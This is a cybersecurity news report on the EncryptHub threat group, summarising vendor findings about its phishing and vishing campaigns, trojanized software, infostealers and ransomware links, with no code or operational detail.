A financially motivated threat actor, known as EncryptHub, has been identified as the mastermind behind a series of sophisticated phishing campaigns. These campaigns involve the deployment of information stealers and ransomware, in addition to the development of a new product called EncryptRAT.
According to a recent report by Outpost24 KrakenLabs, EncryptHub has been targeting users of popular applications by distributing trojanized versions. Furthermore, the threat actor has also utilized third-party Pay-Per-Install (PPI) distribution services to spread malware.
The cybersecurity company described EncryptHub as a hacking group that frequently makes operational security errors. The group incorporates exploits for popular security flaws into their attack campaigns, making them a formidable threat.
EncryptHub, also tracked by Swiss cybersecurity company PRODAFT as LARVA-208, is believed to have become active towards the end of June 2024. The group relies on various approaches, ranging from SMS phishing (smishing) to voice phishing (vishing), in an attempt to trick prospective targets into installing remote monitoring and management (RMM) software.
PRODAFT informed The Hacker News that the spear-phishing group is affiliated with RansomHub and Blacksuit ransomware groups. EncryptHub has been using advanced social engineering tactics to compromise high-value targets across multiple industries.
“The actor typically creates a phishing site that targets the organization to obtain the victim’s VPN credentials,” PRODAFT said. “The victim is then called and asked to enter the victim’s details into the phishing site for technical issues, posing as an IT team or helpdesk. If the attack targeting the victim is not a call but a direct SMS text message, a fake Microsoft Teams link is used to convince the victim.”
The phishing sites are hosted on bulletproof hosting providers like Yalishand. Once access is obtained, EncryptHub proceeds to run PowerShell scripts that lead to the deployment of stealer malware like Fickle, StealC, and Rhadamanthys. The ultimate goal of these attacks is to deliver ransomware and demand a ransom.
Another common method employed by threat actors involves the use of trojanized applications disguised as legitimate software for initial access. These counterfeit applications include fake versions of QQ Talk, QQ Installer, WeChat, DingTalk, VooV Meeting, Google Meet, Microsoft Visual Studio 2022, and Palo Alto Global Protect.
Upon installation, these booby-trapped applications trigger a multi-stage process that acts as a delivery vehicle for next-stage payloads, such as Kematian Stealer, to facilitate cookie theft.
